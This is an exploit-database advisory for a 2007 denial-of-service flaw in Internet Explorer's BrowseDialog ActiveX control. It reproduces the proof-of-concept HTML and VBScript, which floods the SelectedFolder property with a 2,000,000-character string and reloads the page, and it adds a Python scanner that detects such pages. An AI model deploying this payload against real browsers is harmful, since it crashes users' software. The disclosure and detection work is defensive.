vendor: Internet Explorer
by: shinnai
CVSS: N/A
CWE: N/A, Denial of Service
Product Name: Internet Explorer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2
2007

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

The proof of concept embeds the BrowseDialog class ActiveX control (ccrpbds6.dll) in a web page and assigns a 2,000,000-character string to its SelectedFolder property, which causes Internet Explorer to crash or become unresponsive. A second script then reloads the page. The issue was tested on Windows XP Professional SP2 with Internet Explorer 7.

Mitigation:

Unknown
Source

Exploit-DB raw data:

<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'>

argCount = 1

arg1=String(2000000, "A")

CCRP_BDc.SelectedFolder = arg1
</script>

<script language='javascript'>
document.location.reload()
</script>

# milw0rm.com [2007-01-18]
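
A defender-side check for the pattern described above, as an added example that is not part of the original advisory or proof of concept: it parses a page, flags any object element that instantiates the BrowseDialog CLSID, and reports whether script writes to its SelectedFolder property. The class and function names, the element id "dlg" and the sample page are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
# CLSID and property name are taken from the proof of concept on this page.
WATCHED_CLSIDS = {"19E6E148-BAEC-11D2-B03A-EAFC20524153": "BrowseDialog (ccrpbds6.dll)"}
WATCHED_PROPERTIES = ("SelectedFolder",)
CLSID_RE = re.compile(r"clsid:\s*\{?([0-9a-f-]{36})\}?", re.I)

class ObjectScriptCollector(HTMLParser):
    """Collect ids of watched <object> elements and the text of each <script>."""
    def __init__(self):
        super().__init__()
        self.object_ids = {}      # element id -> control name
        self.scripts = []         # one string per <script> block
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "object":
            m = CLSID_RE.search(attrs.get("classid") or "")
            if m and m.group(1).upper() in WATCHED_CLSIDS:
                self.object_ids[attrs.get("id") or ""] = WATCHED_CLSIDS[m.group(1).upper()]
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan_html(html):
    """Return one finding per watched control instantiated in the page."""
    collector = ObjectScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for obj_id, control in collector.object_ids.items():
        # A property counts as written when any script assigns to <id>.<property>.
        written = [p for p in WATCHED_PROPERTIES if obj_id and any(
            re.search(r"\b%s\s*\.\s*%s\s*=" % (re.escape(obj_id), p), s, re.I)
            for s in collector.scripts)]
        findings.append({"control": control, "id": obj_id, "properties_written": written})
    return findings

# Constructed sample page (not captured traffic); "dlg" is a made-up element id.
SAMPLE_FLAGGED = """<html>
<object classid='clsid:19e6e148-baec-11d2-b03a-eafc20524153' id='dlg'></object>
<script language='vbscript'>
dlg.SelectedFolder = "Documents"
</script></html>"""
```

A finding with an empty properties_written list means the control is instantiated but no script on the page assigns to the watched property.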